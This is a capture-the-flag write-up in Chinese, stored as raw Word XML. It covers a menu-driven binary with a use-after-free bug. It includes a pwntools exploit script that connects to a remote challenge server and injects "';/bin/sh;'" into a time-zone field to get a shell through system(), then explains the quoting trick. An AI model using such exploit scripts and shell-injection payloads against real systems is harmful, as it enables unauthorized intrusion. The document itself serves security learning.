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5673" w14:textId="11CCD24C" w:rsidR="00AF29A1" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先checksec一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB235F5" w14:textId="7201A6A4" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009A3AC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6670EA2F" wp14:editId="30BD989A">
            <wp:extent cx="5274310" cy="2098675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="208672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D3AA" w14:textId="1A5FAE64" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到ida看一下是一个选项表</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3AC4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E63946" wp14:editId="124F610B">
            <wp:extent cx="5274310" cy="4729480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4365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54A8" w14:textId="2DB54A44" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到5选项退出有一个UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3AC4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EEEDD69" wp14:editId="670C3AA9">
            <wp:extent cx="5274310" cy="2792095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1181363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3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713B" w14:textId="3CC56C06" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Free之后没有，将他的指针置为NULL，所以我们就可以利用1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02561F81" w14:textId="261B08DC" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项申请地址，利用3写入，在选项4看到了system函数</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3AC4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="762FA6F3" wp14:editId="2088D94C">
            <wp:extent cx="5274310" cy="2121535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="176967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2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D3BF" w14:textId="39263C3B" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E3008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pwn import * </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35255FAD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 = remote('61.147.171.103',62424)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D42F3C" w14:textId="77777777" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68250442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p.sendlineafter("&gt; ","1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2154BB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p.sendlineafter("Format: ","A")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC7454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p.sendlineafter("&gt; ","5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7B806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p.sendlineafter("Are you sure you want to exit (y/N)? ",'N')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB7B3F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p.sendlineafter("&gt; ","3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3FB27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p.sendlineafter("Time zone: ","';/bin/sh;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526C3C9" w14:textId="77777777" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC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p.sendlineafter("&gt; ","4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A7D50" w14:textId="7B31CDD5" w:rsidR="009A3AC4" w:rsidRDefault="009A3AC4" w:rsidP="009A3AC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41366AC8" w14:textId="70AA8E23" w:rsidR="00DC5852" w:rsidRPr="00DC5852" w:rsidRDefault="00EA21D0" w:rsidP="00DC5852">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我来解释一下为什么数传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"';/bin/sh;'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是直接传入/bin/sh，因为他的传参方式是‘%s’，如果只传入/bin/sh就传不全，加；是因为还有别的指令进行</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;/bin/sh;</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”也</w:t>
      </w:r>
      <w:r w:rsidR="00DC5852">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可以</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DC5852" w:rsidRPr="00DC58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F1FC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C905250"/>
    <w:lvl w:ilvl="0" w:tplc="987696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717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A1"/>
    <w:rsid w:val="009A3AC4"/>
    <w:rsid w:val="00AF29A1"/>
    <w:rsid w:val="00BE644A"/>
    <w:rsid w:val="00DC5852"/>
    <w:rsid w:val="00EA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4165D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7767B9DD-FE61-4993-BBD6-C1F7EAD4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2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9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9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9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9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9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9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9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9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9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29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9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9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9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9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9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9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9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2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2025-11-20T03:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T03:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>